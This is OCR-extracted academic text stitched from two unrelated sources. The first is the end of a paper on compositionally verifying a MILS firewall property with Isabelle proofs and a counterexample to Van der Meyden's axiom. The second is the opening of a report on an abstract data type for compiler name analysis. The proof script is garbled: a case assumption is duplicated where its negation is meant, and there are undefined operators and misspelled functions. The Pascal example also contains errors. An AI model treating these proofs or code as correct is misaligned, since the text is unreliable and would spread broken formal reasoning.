Indeed, there is nothing in the \textbf{Black} axiom that requires a computation step of $B$ to maintain the blackness of \texttt{outbox} when all segments accessible to $B$ are black. This would require the next contents of \texttt{outbox} to be a function of the active partition and \texttt{segs}(B). But in general, this is not the case; the Firewall partition generally writes to \texttt{outbox} based on segments not accessible to $B$, which means that the next content of \texttt{outbox} is not independent of those segments. Appendix A describes a specific counterexample in which this is the case, showing that the \textbf{Separation}, FW\_Pol, FW\_Blackens, and \textbf{Black} axioms can all be true while FW\_Correct is false.
To remedy this, we propose a stronger version of the \textbf{Black} axiom that does not suffer from this problem, which we feel better formalises the intuition behind the \textbf{Black} axiom. In his flawed proof, Van der Meyden inadvertently argues that the next contents of \texttt{outbox} are a function of the active partition and the contents of a set $X$ of segments \textit{among those states $s$ for which \texttt{current}$(s) = B$}; because this predicate \texttt{current}$(s) = B$ is true for the specific state he is considering, he concludes that blackness follows for \texttt{outbox} in the next state of this specific state. We feel this line of reasoning should hold for \texttt{black} for arbitrary predicates of $s$. That is, if the functionality of segment $a$ on segments $X$ property holds for all states matching some predicate $P$, and all segments of $X$ are black in a state $s$ also matching this predicate $P$, then $a$ should be black in the next state of $s$.
Formally:
\[
\begin{aligned}
\text{assumes StrongBlack:} \forall P \in \mathbb{P} (\text{State}), \\
X \in \mathbb{P} (\text{Segment}), s \in \text{State}, a \in \text{Segment}. \\
(\forall r, t \in \text{Segment} \cdot P (r) \land P (t) \land \\
\text{equals} (X, r, t) \land \\
\text{current} (r) = \text{current} (t) \rightarrow \\
\text{select} (\text{next} (r), a) = \text{select} (\text{next} (t), a)) \\
(\forall b \in X. \text{black} (s, b)) \\
P (a) \\
\text{black} (\text{next} (s), a)
\end{aligned}
\]
This definition is a generalisation of \textbf{Black}; using $P (s) = \text{true}$ yields \textbf{Black} as a special case. Using this stronger ax-
The WeakBlack axiom is a special case of the StrongBlack axiom produced by substituting the predicate $P(t) \equiv current(s) = current(t)$ for the variable $P$; thus, it trivially follows from StrongBlack. More interestingly, it also follows from Rushby’s axioms, using almost exactly the same proof as the one in Section 5.3:
```isar
fix X s a
assume 1:
(∀r,t ∈ Segment.
current(s) = current(t) ∧ current(r) = current(t) ∧
equals(X, r, t) →
select(next(r), a) = select(next(t), a))
assume (∀b ∈ X.black(s, b))
by (metis 1 B2 B3 equals_def)
thus black(next(s), a)
by (metis B1 B4 B5)
```
When using the WeakBlack axiom instead of Black, Van der Meyden’s proof is correct. We prove this below by presenting Van der Meyden’s proof in fully formalised form in the Isabelle proof system.
The theorem we want to prove is that FW_Correct holds under the assumption of the Separation, FW_Blacks, FW_Pol, and WeakBlack axioms:
```
theorem
assumes Separation: ∀s, t ∈ State, a ∈ Segment.
equals(dia(a) ∩ segs(current(s)), s, t) ∧
current(s) = current(t) ∧
select(s, a) = select(t, a) →
select(next(s), a) = select(next(t), a)
assumes FW_Pol: ∀a, b ∈ Segment, P ∈ Partition.
a ∈ segs(B) ∧
b ∈ dia(a) ∧
b ∈ segs(P) ∧
P ≠ B →
(P = F ∧ a = outbox)
assumes FW_Blacks: ∀s ∈ State.
current(s) = F ∧ black(s, outbox) →
black(next(s), outbox)
assumes WeakBlack: ∀X ∈ P(Segment), s ∈ State, a ∈ Segment.
(∀r,t ∈ Segment.current(s) = current(r) ∧
equals(X, r, t) ∧
current(r) = current(t) →
select(next(r), a) = select(next(t), a)) ∧
(∀b ∈ X.black(s, b)) →
black(next(s), a)
```
Proof of this property is ultimately by induction on $n$. To simplify things, we first prove the correctness of the induction step as a lemma.
```
proof -
```
have 0: \( \forall s \in \text{State}, a \in \text{Segment}. \)
\( (\forall b \in \text{segs}(B). \blacken{(s, b)}) \rightarrow \)
\( a \in \text{segs}(B) \rightarrow \blacken{(\text{next}(s), a)} \)
proof -
fix \( s, a \)
assume 1: \( \forall b \in \text{segs}(B). \blacken{(s, b)} \)
assume 2: \( a \in \text{segs}(B) \)
We now need to prove that \( \blacken{(\text{next}(s), a)} \). This proof will proceed by cases, but first we prove the simple lemma that \( \text{FW}_{-}\text{Pol} \) applies to \( a \): in other words, that if something can influence \( a \), then \( a \) must be \( \text{outbox} \) and that something must be accessible only to \( B \) and \( F \). This is a triviality, but proving it here will spare us the effort of having to duplicate the proof in all the cases that make use of it.
with \( \text{FW}_{-}\text{Pol} \) have 3:
\( \forall b \in \text{Segment}, P \in \text{Partition}. \)
\( b \in \text{segs}(P) \rightarrow P \neq B \rightarrow b \in \text{dia}(a) \rightarrow (a = \text{outbox} \land P = F) \)
by simp
The proof of \( \blacken{(\text{next}(s), a)} \) will proceed by cases. We first consider the case where \( a \neq \text{outbox} \).
show \( \blacken{(s, a)} \)
proof cases
assume 4: \( a \neq \text{outbox} \)
Because \( a \neq \text{outbox} \), by \( \text{FW}_{-}\text{Pol} \) and \( \text{Separation} \) it follows that the next contents of \( a \) are a function of the contents of \( \text{segs}(B) \) and the active partition. The \( \text{WeakBlack} \) axiom then requires that the blackness of the segments in \( \text{segs}(B) \) which we assumed in assumption 1. To show this, we first need to establish the functional dependence of \( a \) on \( \text{segs}(B) \) and the active partition as a lemma to later feed to \( \text{WeakBlack} \).
have \( \forall r, t \in \text{State}. \)
\( \text{current}(s) = \text{current}(r) \rightarrow \)
\( \text{current}(r) = \text{current}(t) \rightarrow \)
\( \text{equals}(\text{segs}(B), r, t) \rightarrow \)
\( \text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \)
proof auto
fix \( r, t \)
assume 5: \( \text{current}(s) = \text{current}(t) \)
assume 6: \( \text{current}(r) = \text{current}(t) \)
assume 7: \( \text{equals}(\text{segs}(B), r, t) \)
Because \( a \in \text{segs}(B) \) and \( \text{equals}(\text{segs}(B), r, t) \), we have \( \text{select}(r, a) = \text{select}(t, a) \).
with 2 have 8: \( \text{select}(r, a) = \text{select}(t, a) \)
unfolding \text{equals}_{-}\text{def} \) by simp
Because of \( \text{FW}_{-}\text{Pol} \) and the fact that \( a \neq \text{outbox} \), we must have \( \text{dia}(a) \subseteq \text{segs}(B) \). Because \( \text{equals}(\text{segs}(B), r, t) \) and \( (X \cap Y) \subseteq X \), we certainly have the following:
from 3 4 7 have \( \text{equals}(\text{dia}(a) \cap \text{segs}(\text{current}(r)), r, t) \)
unfolding \text{equals}_{-}\text{def} \) by auto
But then \( \text{Separation} \) gives us the desired result:
with 6 8 \( \text{Separation} \) show \( \text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \)
by simp
qed
This finishes the lemma stating that the next contents of \( a \) are a function of the contents of \( \text{segs}(B) \) and the active partition. The \( \text{WeakBlack} \) axiom will now prove the blackness of \( a \) in \( \text{next}(s) \).
with 1 \( \text{WeakBlack} \) show \( \blacken{(\text{next}(s), a)} \) by auto
This finishes the case where \( a \neq \text{outbox} \).
Next, we make a further case distinction on the value of the active partition in \( s \). We consider three cases: \( \text{current}(s) = B, \text{current}(s) = F, \) and \( \text{current}(s) \neq B \land \text{current}(s) \neq F. \)
next assume 4: \( a \neq \text{outbox} \)
show \( ?\text{thesis} \)
proof cases
assume 5: \( \text{current}(s) = B \)
The case where \( \text{current}(s) = B \) uses the same structure as the \( a \neq \text{outbox} \) case. It first proves the lemma that the next contents of \( a \) are a function of the contents of \( \text{segs}(B) \) and the active partition.
have \( \forall r, t \in \text{State}. \)
\( \text{current}(s) = \text{current}(r) \rightarrow \)
\( \text{current}(r) = \text{current}(t) \rightarrow \)
\( \text{equals}(\text{segs}(B), r, t) \rightarrow \)
\( \text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \)
proof auto
fix \( r, t \)
assume 6: \( \text{current}(s) = \text{current}(t) \)
assume 7: \( \text{current}(r) = \text{current}(t) \)
assume 8: \( \text{equals}(\text{segs}(B), r, t) \)
with 2 have 9: \( \text{select}(r, a) = \text{select}(t, a) \)
unfolding \text{equals}_{-}\text{def} \) by simp
The details of this step are different from the \( a \neq \text{outbox} \) case, however. Here, the next contents of \( a \) are only a function of the contents of \( \text{segs}(B) \) and the active partition for those states \( s \) with \( \text{current}(s) = B \); in other words, this is the point in the proof in which the difference between \( \text{WeakBlack} \) and \( \text{Black} \) is crucial, and it’s the point where Van der Meyden’s original proof is incorrect. Because \( \text{current}(r) = \text{current}(t) \), we have \( \text{equals}(\text{dia}(a) \cap \text{segs}(\text{current}(r)), r, t) \):
from 5 6 7 8 have
\( \text{equals}(\text{dia}(a) \cap \text{segs}(\text{current}(r)), r, t) \)
unfolding \text{equals}_{-}\text{def} \) by simp
The remainder of this case proceeds in the same way as the case where \( a \neq \text{outbox} \).
with 7 9 \( \text{Separation} \) show \( \text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \)
by simp
qed
with 1 \( \text{WeakBlack} \) show \( \blacken{(\text{next}(s), a)} \) by auto
This concludes the case where \( \text{current}(s) = B \).
The case where \( \text{current}(s) = F \) is almost trivial; blackness of \( a \) in \( \text{next}(s) \) follows immediately from its blackness in \( s \) and \( \text{FW}_{-}\text{Blackens} \):
next assume 5: \( \text{current}(s) \neq B \)
show \( ?\text{thesis} \)
proof cases
assume 6: \( \text{current}(s) = F \)
from 1 2 4 have \( \blacken{(s, \text{outbox})} \) by simp
with 4 6 \( \text{FW}_{-}\text{Blackens} \) show \( ?\text{thesis} \) by simp
All that remains is the case where both $\text{current}(s) \neq B \land \text{current}(s) \neq F$. This, too, is a simple case: the security policy forbids the active partition from modifying any of the segments of $B$, which means the same proof used for the $a \neq \text{outbox}$ case applies.
\text{next assume 6: } \text{current}(s) \neq F \\
\text{have } \forall r, t \in \text{State}. \\
\text{current}(s) = \text{current}(r) \rightarrow \\
\text{current}(r) = \text{current}(t) \rightarrow \\
\text{equals}(\text{segs}(B), r, t) \rightarrow \\
\text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \\
\text{proof auto} \\
\text{fix } r, t \\
\text{assume 8: } \text{current}(s) = \text{current}(t) \\
\text{assume 9: } \text{current}(r) = \text{current}(t) \\
\text{assume equals}(\text{segs}(B), r, t) \\
\text{with 2 have 10: } \text{select}(r, a) = \text{select}(t, a) \\
\text{unfolding equals_def by simp} \\
\text{with 3 5 6 8 9 have} \\
\text{equals}(\text{din}(a) \cap \text{segs}(\text{current}(r)), r, t) \\
\text{unfolding equals_def by auto} \\
\text{with 9 10 Separation show} \\
\text{select}(\text{next}(r), a) = \text{select}(\text{next}(t), a) \\
\text{by simp} \\
\text{qed} \\
\text{with 1 WeakBlack show black(\text{next}(s), a) by auto} \\
\text{qed qed qed qed}
Because this is the last case, this finishes the proof of the lemma which states the correctness of the induction step of the main theorem. That is, we just proved $\forall s, a, (\forall b \in \text{segs}(B). \text{black}(s, b)) \rightarrow a \in \text{segs}(B) \rightarrow \text{black}(\text{next}(s), a)$.
With this lemma in hand, we can now easily prove the main theorem, with an appeal to the lemma 0 in the induction step:
$$
\forall s \in \text{State}, n \in \mathbb{N}.
(\forall a \in \text{segs}(B). \text{black}(s, a)) \rightarrow \\
(\forall a \in \text{segs}(B). \text{black}(\text{run}(n, s), a))
$$
\text{proof -} \\
\text{fix } s, n \\
\text{assume } \forall a \in \text{segs}(B). \text{black}(s, a) \\
\text{then show } \forall a \in \text{segs}(B). \text{black}(\text{run}(n, s), a) \\
\text{proof (induction } n, \text{ auto)} \\
\text{fix } n, x \\
\text{assume 2: } \forall x \in \text{segs}(B). \text{black}(\text{run}(n, s), x) \\
\text{assume 3: } x \in \text{segs}(B) \\
\text{with 0 2 show black(\text{next}(\text{run}(n, s)), x) by simp} \\
\text{qed qed qed qed}$$
This completes the proof.
8. CONCLUSION
In the previous section, we have proven the formal property $\text{Separation} \land \text{FW_Pol} \land \text{FW_Blackens} \land \text{WeakBlack} \rightarrow \text{FW_Correct}$. That is, we have shown that the desired security property that the untrusted application does not gain access to unprivileged information holds, under assumptions that the separation kernel and Firewall application behave in a certain way.
The point of this exercise is to study techniques for the formal verification of system properties in a compositional way. In this paper we did not prove any properties about the behaviour of system components such as the separation kernel or the Firewall; instead, these properties were taken for granted. The problem studied in this paper is how to make use of independently proven properties describing individual system components to prove properties of the system as a whole in which these components play a role; that is, to compose verified behaviour of components into verified behaviour of the complete system.
When verifying practical systems, one would presumably independently prove behavioural properties regarding individual system components, and then later attempt the composition in a way similar to the methods used in this paper. Based on our experience formalising the notions presented in this paper, we feel confident that compositional formal validation of system properties is a practical technique for certifying desired system properties in applications such as security certification.
Acknowledgments
We acknowledge funding from the European Union’s Seventh Framework Programme (FP7/2007-2013) under grant agreement n° 318353 (EURO-MILS project: http://www.euromils.eu).
9. REFERENCES
APPENDIX
A. COUNTEREXAMPLE TO VAN DER MEYDEN’S AXIOM
In Section 6, we described how a system can be constructed that satisfies the Separation, FW_Pol, FW_Blackens, and Black axioms, while still not satisfying FW_Correct. For the sake of completion, we provide here a specific minimal system for which this is the case.
Consider a GWV system as described in Section 3 consisting of two segments outbox and inbox, a partition B with \( \text{segs}(B) = \{\text{outbox}\} \), and a second partition F with \( \text{segs}(F) = \{\text{outbox, inbox}\} \). The dia function does not constrain any types of influence: \( \text{dia}(a) = \{\text{outbox, inbox}\} \) for both values of a. The system has three possible states, named \( S_1 \), \( S_2 \), and \( S_3 \). The three states succeed each other in a cycle: \( \text{next}(S_1) = S_2 \), \( \text{next}(S_2) = S_3 \), and \( \text{next}(S_3) = S_1 \).
The contents of the memory, its sensitivity, and the active partition are summarized in Table 1. The \( F \) partition is active in the states \( S_1 \) and \( S_2 \), and \( B \) is active in \( S_3 \). The contents of outbox are equal for states \( S_1 \) and \( S_2 \), and different for \( S_3 \); the contents of inbox are equal for \( S_1 \) and \( S_3 \) and different for \( S_2 \). Of course, the exact values are irrelevant.
The outbox segment is black in states \( S_2 \) and \( S_3 \); the inbox segment is never black. This has the curious property that the states \( S_1 \) and \( S_2 \) have the same contents for the outbox segment, but differing blackness for that segment: the GWV and Rushby axiomatisations of the black predicate would not allow this, but it is possible under the Black axiom.
The system described here satisfies the Separation axiom. Because the dia function describes the complete relation and thus does not forbid anything, and because \( B \) does not write to inbox in the one state in which it is active, this is trivial.
Because \( B \) and \( F \) are the only partitions in the system and outbox is the only segment in segs(B), FW_Pol is trivially satisfied. The FW_Blackens axiom is easily checked by verifying that black(next(s),outbox) is true for every state s with current(s) = \( F \).
Showing that this system satisfies Black is less obvious. The value of outbox in the next state of s is not a function of the current value of outbox and the active partition; indeed, the states \( S_1 \) and \( S_2 \) have the same active partition and the same values for outbox, yet select(next(S_1),outbox) = 1 \( \neq \) 2 = select(next(S_2),outbox). The value of outbox in the next stage of s is a function of the current value of inbox and the active partition, and therefore also of the superset {outbox, inbox}. However, all we can conclude from this using the Black axiom is that if all segments in {inbox} are black, then outbox must be black in the next state. Because inbox is never black, this is vacuously true. Thus, the system satisfies Black in a vacuous way.
The WeakBlack axiom, and therefore also the StrongBlack axiom, would note that among all states for which current(s) = \( B \), the contents of outbox in the next state is a function of the active partition and the contents of outbox; indeed, it is even a function of the active partition and the contents of \( \emptyset \). Thus, they would require that whenever outbox is black in a state for which \( B \) is the active partition, then outbox must still be black in the next state. This system, then, does not satisfy the WeakBlack axiom, and is not a counterexample against it.
For the Black axiom, however, it is indeed a counterexample. For this system does not satisfy FW_Correct; in state \( S_1 \) all segments of \( B \) are black, yet in the next state \( S_1 \), this is no longer the case. That makes this a system for the Separation, FW_Pol, FW_Blackens, and Black axioms are satisfied, yet FW_Correct does not hold, and a proof that Van der Meyden’s proof is flawed.
<table>
<thead>
<tr>
<th>s</th>
<th>next(s)</th>
<th>current(s)</th>
<th>select(s,outbox)</th>
<th>select(s, inbox)</th>
<th>black(s,outbox)</th>
<th>black(s,inbox)</th>
</tr>
</thead>
<tbody>
<tr>
<td>S_1</td>
<td>S_2</td>
<td>( F )</td>
<td>1</td>
<td>3</td>
<td>false</td>
<td>false</td>
</tr>
<tr>
<td>S_2</td>
<td>S_3</td>
<td>( F )</td>
<td>1</td>
<td>4</td>
<td>true</td>
<td>false</td>
</tr>
<tr>
<td>S_3</td>
<td>S_1</td>
<td>( B )</td>
<td>2</td>
<td>3</td>
<td>true</td>
<td>false</td>
</tr>
</tbody>
</table>
Table 1: The Firewall MILS Example.
|
{"Source-Url": "http://www.win.tue.nl/~jschmalt/publications/mils15/12-mils15_submission_4.pdf", "len_cl100k_base": 12934, "olmocr-version": "0.1.53", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 39804, "total-output-tokens": 14426, "length": "2e13", "weborganizer": {"__label__adult": 0.000492095947265625, "__label__art_design": 0.0005626678466796875, "__label__crime_law": 0.000865936279296875, "__label__education_jobs": 0.001003265380859375, "__label__entertainment": 0.00011479854583740234, "__label__fashion_beauty": 0.00024580955505371094, "__label__finance_business": 0.0011272430419921875, "__label__food_dining": 0.0005216598510742188, "__label__games": 0.0010461807250976562, "__label__hardware": 0.0030879974365234375, "__label__health": 0.0010013580322265625, "__label__history": 0.0003399848937988281, "__label__home_hobbies": 0.0001913309097290039, "__label__industrial": 0.0010814666748046875, "__label__literature": 0.0005321502685546875, "__label__politics": 0.0005974769592285156, "__label__religion": 0.0006108283996582031, "__label__science_tech": 0.332275390625, "__label__social_life": 0.0001132488250732422, "__label__software": 0.012176513671875, "__label__software_dev": 0.640625, "__label__sports_fitness": 0.0002675056457519531, "__label__transportation": 0.000927448272705078, "__label__travel": 0.0001983642578125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 48665, 0.00928]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 48665, 0.37117]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 48665, 0.84636]], "google_gemma-3-12b-it_contains_pii": [[0, 4734, false], [4734, 10438, null], [10438, 16947, null], [16947, 23051, null], [23051, 30283, null], [30283, 32014, null], [32014, 38295, null], [38295, 44104, null], [44104, 48665, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4734, true], [4734, 10438, null], [10438, 16947, null], [16947, 23051, null], [23051, 30283, null], [30283, 32014, null], [32014, 38295, null], [38295, 44104, null], [44104, 48665, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 48665, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 48665, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 48665, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 48665, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 48665, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 48665, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 48665, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 48665, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 48665, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 48665, null]], "pdf_page_numbers": [[0, 4734, 1], [4734, 10438, 2], [10438, 16947, 3], [16947, 23051, 4], [23051, 30283, 5], [30283, 32014, 6], [32014, 38295, 7], [38295, 44104, 8], [44104, 48665, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 48665, 0.01085]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
49a815f117bca1f25bc2f0f164b0dc362fff73d2
|
[REMOVED]
|
{"len_cl100k_base": 15170, "olmocr-version": "0.1.53", "pdf-total-pages": 27, "total-fallback-pages": 0, "total-input-tokens": 75538, "total-output-tokens": 18856, "length": "2e13", "weborganizer": {"__label__adult": 0.0003540515899658203, "__label__art_design": 0.0003817081451416016, "__label__crime_law": 0.0003509521484375, "__label__education_jobs": 0.0006923675537109375, "__label__entertainment": 6.014108657836914e-05, "__label__fashion_beauty": 0.0001703500747680664, "__label__finance_business": 0.00031447410583496094, "__label__food_dining": 0.00033020973205566406, "__label__games": 0.0006442070007324219, "__label__hardware": 0.0012760162353515625, "__label__health": 0.0005483627319335938, "__label__history": 0.0002713203430175781, "__label__home_hobbies": 0.0001208186149597168, "__label__industrial": 0.0004792213439941406, "__label__literature": 0.00031185150146484375, "__label__politics": 0.00027441978454589844, "__label__religion": 0.00051116943359375, "__label__science_tech": 0.03387451171875, "__label__social_life": 7.224082946777344e-05, "__label__software": 0.00536346435546875, "__label__software_dev": 0.9521484375, "__label__sports_fitness": 0.0003113746643066406, "__label__transportation": 0.0006971359252929688, "__label__travel": 0.0001958608627319336}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 63198, 0.02566]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 63198, 0.36981]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 63198, 0.84283]], "google_gemma-3-12b-it_contains_pii": [[0, 2342, false], [2342, 4813, null], [4813, 8007, null], [8007, 10090, null], [10090, 12086, null], [12086, 14769, null], [14769, 17316, null], [17316, 19953, null], [19953, 22362, null], [22362, 24598, null], [24598, 26341, null], [26341, 28726, null], [28726, 30573, null], [30573, 32579, null], [32579, 34172, null], [34172, 35771, null], [35771, 37589, null], [37589, 40132, null], [40132, 42492, null], [42492, 44867, null], [44867, 45115, null], [45115, 47791, null], [47791, 50127, null], [50127, 52735, null], [52735, 55491, null], [55491, 58824, null], [58824, 63198, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2342, true], [2342, 4813, null], [4813, 8007, null], [8007, 10090, null], [10090, 12086, null], [12086, 14769, null], [14769, 17316, null], [17316, 19953, null], [19953, 22362, null], [22362, 24598, null], [24598, 26341, null], [26341, 28726, null], [28726, 30573, null], [30573, 32579, null], [32579, 34172, null], [34172, 35771, null], [35771, 37589, null], [37589, 40132, null], [40132, 42492, null], [42492, 44867, null], [44867, 45115, null], [45115, 47791, null], [47791, 50127, null], [50127, 52735, null], [52735, 55491, null], [55491, 58824, null], [58824, 63198, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 63198, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 63198, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 63198, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 63198, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 63198, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 63198, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 63198, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 63198, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 63198, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 63198, null]], "pdf_page_numbers": [[0, 2342, 1], [2342, 4813, 2], [4813, 8007, 3], [8007, 10090, 4], [10090, 12086, 5], [12086, 14769, 6], [14769, 17316, 7], [17316, 19953, 8], [19953, 22362, 9], [22362, 24598, 10], [24598, 26341, 11], [26341, 28726, 12], [28726, 30573, 13], [30573, 32579, 14], [32579, 34172, 15], [34172, 35771, 16], [35771, 37589, 17], [37589, 40132, 18], [40132, 42492, 19], [42492, 44867, 20], [44867, 45115, 21], [45115, 47791, 22], [47791, 50127, 23], [50127, 52735, 24], [52735, 55491, 25], [55491, 58824, 26], [58824, 63198, 27]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 63198, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
5b27d352b937715f89e536d7baec6e3309c3ed51
|
An Abstract Data Type for Name Analysis
U. Kastens
W. M. Waite
CU-CS-460-90
ANY OPINIONS, FINDINGS, AND CONCLUSIONS OR RECOMMENDATIONS EXPRESSED IN THIS PUBLICATION ARE THOSE OF THE AUTHOR(S) AND DO NOT NECESSARILY REFLECT THE VIEWS OF THE AGENCIES NAMED IN THE ACKNOWLEDGMENTS SECTION.
An Abstract Data Type for Name Analysis
U. Kastens
W. M. Waite
CU-CS-460-90 March, 1990
ABSTRACT: This paper defines an abstract data type on which a solution to the name analysis subproblem of a compiler can be based. We give a state model for the ADT, and showed how that model could be implemented efficiently. The implementation is independent of any particular name analysis, so it is possible to create a library module that can be used in any compiler. Such a library module has been incorporated into the Eli compiler construction system.
1. Introduction
The problem of compiling a program can be decomposed into a number of sub-problems, many of which have standard solutions. If a subproblem has a standard solution, there is no need for a compiler designer to re-invent that solution. The standard solution can be packaged in a module and re-used. Development of a library of such modules should be accorded high priority by researchers studying the compiler construction process.
In this paper we consider the name analysis subproblem. This is the problem of determining which source language entity is denoted by each identifier occurrence in a program. For example, in the Pascal program of Figure 1 the programmer has used the identifier $A$ to denote a variable on line 10. On line 12, $A$ denotes a field of the record pointed to by $P$. The identifier $B$, on the other hand, has been used to denote a field of the record $R$ (declared on line 6) on both lines. A Pascal compiler’s name analysis task must determine which entity is denoted by each occurrence of $A$, which by each occurrence of $B$, and so forth.
Source language entities are described by sets of properties. The Pascal entity declared on line 6 of Figure 1 is a variable capable of holding values of a particular type. Its lifetime is the entire execution history of the program, and it will occupy a certain amount of storage at a particular address during execution. Thus this entity might be described by the following property values:
```pascal
1 program Context (input, output);
2 const C = 1.2;
3 type T = record A, B, C: integer end;
4 var
5 A: real;
6 R: T;
7 P: T;
8 begin
9 new (P); readln (R, B, C, P^C);
10 A := R.B + C;
11 with P do (* Re-defines A B C *)
12 A := R.B + C;
13 R := P^; writeln (A, R.A);
14 end.
```
Figure 1
A Pascal Program
Class: Variable
Type: real (determines the storage requirement also)
Level: 1 (indicates the variable is global)
Offset: -12 (address relative to the global storage area base)
All entities would have a Class property in their description, but the remaining properties might be different for entities of different classes.
Each entity can be characterized by a key, which allows the compiler to access the entity's properties. Because the key characterizes the source program entity, the name analyzer need only determine a key for each identifier occurrence. Property access may be implemented by an appropriate data base technique or a definition table with one entry for each key, but these decisions are totally independent of name analysis.
Name analysis is based on the scope rules of the source language being compiled. Scope rules are formulated in terms of definitions, which cause identifiers to denote source language entities, and program regions: For each definition, the scope rules specify the program region in which that definition is valid. In Figure 1, the variable declaration on line 6 is a definition that causes the identifier R to denote a particular Pascal entity. The scope rules of Pascal state that this definition is valid for the region consisting of lines 2 through 14.
A definition is represented in the compiler by a binding between an identifier and a key. The particular set of (identifier,key) bindings valid at a program point is called the environment of that program point. At the occurrence of A in line 10 of Figure 1, the scope rules of Pascal specify that bindings exist for C, T, A, R, P, and all of the predefined identifiers of Pascal. At the occurrence of B on the same line, however, only bindings for A, B and C are valid. Moreover, the binding for A valid at the occurrence of A is different from the binding for A valid at the occurrence of B.
The concept of an environment can be captured in an abstract data type (ADT). This ADT provides operations for creating environments, populating them with (identifier,key) bindings, and carrying out mappings from identifiers to keys based upon them. If a module that efficiently implements the environment ADT is available, a compiler's name analysis task can be carried out by appropriate invocations of that module's operations. The module itself is independent of the source language; different scope rules affect only the way in which the module is invoked.
We describe the structure and operations of the environment ADT algebraically in Section 2. Section 3 presents a state model of the ADT, and Section 4 shows how that model can be efficiently implemented by a standard module. In Section 5 we show how the standard environment module can be used to carry out name analysis for several important kinds of scope rules, demonstrating that it supports a wide range of compilers.
2. The Environment Abstract Data Type
The computations used during name analysis can be specified algebraically in terms of three abstract data types:
- **Identifier** — The compiler’s internal representation of an identifier
- **DefTableKey** — The compiler’s internal representation of a key
- **Environment** — The compiler’s internal representation of a scope
Each textually-distinct identifier is represented by a unique value of type Identifier. (The meaning of “textually-distinct” depends, of course, on the source language. A compiler for Pascal would represent both Xy and xy by the same Identifier value, but a C compiler would use different Identifier values for these identifiers.) Values of type DefTableKey provide access to the properties of an object. There is a distinguished DefTableKey value, NoKey, that provides access to no properties. We shall not explore the details of the Identifier and DefTableKey ADTs in this paper.
There are as many interesting Environment values as there are distinct scopes in a program. (“Scope” was introduced in the ALGOL 60 Report as the name for the region of a program in which the declaration of an identifier denoting a particular entity is valid.) In most programs, several definitions are valid over identical regions of the program and thus the number of distinct scopes is smaller than the number of distinct (identifier, key) bindings. For example, in Figure 1 the scopes of the field identifiers A, B, and C are identical. The constant, type and variable identifiers in Figure 1 also have identical scopes, and these scopes are distinct from those of the field identifiers. A third set of identical scopes, those for the pseudo-variables implicitly defined by the **with** statement, exists in Figure 1. Finally, the Pascal Standard defines a scope external to the program for the required identifiers (e.g., integer, real). Thus four Environment values would be used by a Pascal compiler when compiling Figure 1 because there are four distinct scopes in that program.
Although Figure 1 has only four distinct scopes, there are five distinct environments for program points. Let us consider two of these:
1) The environment for the occurrences of B in lines 10 and 12, and the second occurrence of A in line 13, contains only bindings for A, B and C. Each identifier is bound to a key characterizing a field of the record type declared on line 3.
2) The environment for the program points between the keywords **record** and **end** in line 3 contains the bindings of environment (1), plus bindings for T, R, P and all of the predefined identifiers of Pascal.
The difference between these two environments is that (2) has inherited a number of bindings valid in the region outside the record declaration. That inheritance is the result of the following scope rule, first stated for ALGOL 60 and since used for almost all hierarchically-structured programming languages with static binding:
A definition is valid in its own scope and in all nested scopes not containing a definition for the same identifier.
As a consequence, a definition in a scope hides definitions for the same identifier in enclosing scopes, which is why environment (2) did not inherit the binding between the
identifier $A$ and the key for the real variable declared on line $5$.
